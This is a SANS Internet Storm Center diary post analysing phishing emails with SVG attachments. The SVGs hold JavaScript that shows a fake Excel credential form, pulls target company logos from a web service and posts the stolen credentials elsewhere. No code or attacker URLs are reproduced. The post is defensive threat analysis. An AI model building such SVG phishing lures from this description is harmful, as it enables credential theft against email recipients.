Increase In Phishing SVG Attachments, (Thu, Nov 21st)

This post was originally published on this site

There is an increase in SVG attachments used in phishing emails (Scalable Vector Graphics, an XML-based vector image format).

I took a look at the some samples mentioned in the Bleeping Computer article, and searched more samples on VirusTotal.

These samples contain HTML & JavaScript code to display a blurry Excel PNG image, and a phishing form asking for credentials. Like this one:

It contains 3 PNG files as data URIs, which can easily be extracted with base64dump.py:

You have the blurry Excel PNG:

An Excel logo:

And a Microsoft logo:

I made some small changes to the sample, so that it would display an example.com email address, instead of a real victim's address that I would have to redact. The email address is hardcoded in BASE64 in the SVG file.

Here I made another example, using a SANS email address:

Do you see a difference, besides the SANS email address?

The SANS logo appears in the form!

Where did that logo come from, it's not embedded in the SVG file!

That logo is retrieved using a web service: logo[.]clearbit[.com].

As an example, here is the retrieval of the Wikipedia logo:

Here are the URLs in this SVG file:

There's JavaScript code inside this SVG file to make a web request and display the appropriate logo (or the embedded Microsoft logo, if the service doesn't provide a logo).

And the last URL you see in this screenshot, is where the form data will be posted (the phished credentials).

That one is the most prevalent in the samples I got from VirusTotal, but there are some other ones:

And I have one sample with heavily obfuscated JavaScript, without cleartext URLs. I'll keep that one for another diary entry …

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.